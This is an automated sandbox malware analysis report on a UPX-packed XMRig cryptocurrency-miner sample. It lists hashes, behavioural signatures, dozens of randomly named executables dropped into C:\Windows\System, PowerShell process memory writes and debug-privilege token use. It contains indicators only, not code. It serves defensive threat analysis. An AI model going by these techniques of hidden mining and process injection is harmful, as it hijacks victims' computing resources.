Malware Analysis Report

2025-04-19 18:40

Sample ID 240527-g8wz9sbh29
Target 22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe
SHA256 3c731e1b28cb9a643b07fe36b1fe071c6efa587477ab1bef6db91c894894e070
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3c731e1b28cb9a643b07fe36b1fe071c6efa587477ab1bef6db91c894894e070

Threat Level: Known bad

The file 22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Enumerates system info in registry

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 06:29

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 06:29

Reported

2024-05-27 06:31

Platform

win7-20240221-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\PigjwOV.exe N/A
N/A N/A C:\Windows\System\biHOyov.exe N/A
N/A N/A C:\Windows\System\QDAlBoD.exe N/A
N/A N/A C:\Windows\System\aFHiKLS.exe N/A
N/A N/A C:\Windows\System\CPsMpIJ.exe N/A
N/A N/A C:\Windows\System\lMouqlA.exe N/A
N/A N/A C:\Windows\System\RhHVibn.exe N/A
N/A N/A C:\Windows\System\aaqKwHW.exe N/A
N/A N/A C:\Windows\System\SKvETSg.exe N/A
N/A N/A C:\Windows\System\CXuPzIZ.exe N/A
N/A N/A C:\Windows\System\Fedxevy.exe N/A
N/A N/A C:\Windows\System\EPoxBxP.exe N/A
N/A N/A C:\Windows\System\jxeMTPD.exe N/A
N/A N/A C:\Windows\System\vzYzWzB.exe N/A
N/A N/A C:\Windows\System\OlBxnGD.exe N/A
N/A N/A C:\Windows\System\NmlVIiL.exe N/A
N/A N/A C:\Windows\System\aeNtqSw.exe N/A
N/A N/A C:\Windows\System\IaWMBNb.exe N/A
N/A N/A C:\Windows\System\HHpPBpc.exe N/A
N/A N/A C:\Windows\System\HKFXKCj.exe N/A
N/A N/A C:\Windows\System\WWGMLDG.exe N/A
N/A N/A C:\Windows\System\QqsRSyx.exe N/A
N/A N/A C:\Windows\System\CtqiLgi.exe N/A
N/A N/A C:\Windows\System\mKJlZes.exe N/A
N/A N/A C:\Windows\System\kJymasj.exe N/A
N/A N/A C:\Windows\System\siHpAVP.exe N/A
N/A N/A C:\Windows\System\hmoVzXV.exe N/A
N/A N/A C:\Windows\System\mJJVOuY.exe N/A
N/A N/A C:\Windows\System\LVdrRmy.exe N/A
N/A N/A C:\Windows\System\LIwrXIg.exe N/A
N/A N/A C:\Windows\System\DMBAsuQ.exe N/A
N/A N/A C:\Windows\System\XdwqfbZ.exe N/A
N/A N/A C:\Windows\System\YshwZtq.exe N/A
N/A N/A C:\Windows\System\hAITjFG.exe N/A
N/A N/A C:\Windows\System\BLbNZbb.exe N/A
N/A N/A C:\Windows\System\PBxEKKt.exe N/A
N/A N/A C:\Windows\System\YMcBWoU.exe N/A
N/A N/A C:\Windows\System\RayQiMa.exe N/A
N/A N/A C:\Windows\System\FIzboHd.exe N/A
N/A N/A C:\Windows\System\ggnNHta.exe N/A
N/A N/A C:\Windows\System\xtmBZSx.exe N/A
N/A N/A C:\Windows\System\gbvdihC.exe N/A
N/A N/A C:\Windows\System\OCuKRNG.exe N/A
N/A N/A C:\Windows\System\Ldzazvs.exe N/A
N/A N/A C:\Windows\System\tCuUmqW.exe N/A
N/A N/A C:\Windows\System\QfECWlL.exe N/A
N/A N/A C:\Windows\System\FydgYRf.exe N/A
N/A N/A C:\Windows\System\KDxacMN.exe N/A
N/A N/A C:\Windows\System\OAZSFQr.exe N/A
N/A N/A C:\Windows\System\XStNXuo.exe N/A
N/A N/A C:\Windows\System\qWxpPNz.exe N/A
N/A N/A C:\Windows\System\ofjzRdH.exe N/A
N/A N/A C:\Windows\System\GLmTBRC.exe N/A
N/A N/A C:\Windows\System\LQaLAHM.exe N/A
N/A N/A C:\Windows\System\oOSTrIu.exe N/A
N/A N/A C:\Windows\System\maHhlti.exe N/A
N/A N/A C:\Windows\System\oofflXr.exe N/A
N/A N/A C:\Windows\System\mfRLnAU.exe N/A
N/A N/A C:\Windows\System\uQHnSUA.exe N/A
N/A N/A C:\Windows\System\kOZatxF.exe N/A
N/A N/A C:\Windows\System\ixOxQuN.exe N/A
N/A N/A C:\Windows\System\vvxlkPU.exe N/A
N/A N/A C:\Windows\System\DXmuuEL.exe N/A
N/A N/A C:\Windows\System\VvJNLbI.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\xZuOMXa.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\GDNWQfu.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\mkNsBGu.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\FZDFsyF.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\RLRsIWa.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\HUHUoAR.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\KuWrMRz.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\DdhSoFw.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\OfqzeSz.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\sqcjcNf.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\tzOselC.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\raXLlQq.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\gsMYDaY.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\llErHrC.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\tuVZGpb.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\YmuWMeo.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\MtYoHAP.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\UgJattd.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\BnHRSsk.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\yNEJKAM.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\rrcOboI.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\tQhWZBk.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\WMtrCyV.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\YlKrJtZ.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\aAUdchA.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\qRIJzUJ.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\JGPEyNx.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\cnvmOmn.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\BzOWCnf.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\qxTNDqy.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\FmzvMWC.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\CoLhSvW.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\DBdUZCf.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\ehWtBqL.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\LapDhuu.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\PZUeoKE.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\sZljWLC.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\gDQObmy.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\rfjjwVl.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\OYxxVvc.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\rvhsNgX.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\vHMPxfZ.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\lTcAfLI.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\XjbqMAa.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\tWGHQXA.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\yhOpTLt.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\cTbhCwa.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\JaNDgyT.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\CegvOPt.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\JEaVAPK.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\HwTKSOZ.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\jKIvtzd.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\qOQDLAa.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\QCsOvwU.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\IoOdiYB.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\fxwNEJG.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\nRULsFb.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\ERmeKjI.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\gFdVMaC.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\bNNxPmH.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\XTnUdVa.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\KKkodjk.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\edQaPna.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\YMSeoql.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3024 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3024 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3024 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3024 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\PigjwOV.exe
PID 3024 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\PigjwOV.exe
PID 3024 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\PigjwOV.exe
PID 3024 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\biHOyov.exe
PID 3024 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\biHOyov.exe
PID 3024 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\biHOyov.exe
PID 3024 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\QDAlBoD.exe
PID 3024 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\QDAlBoD.exe
PID 3024 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\QDAlBoD.exe
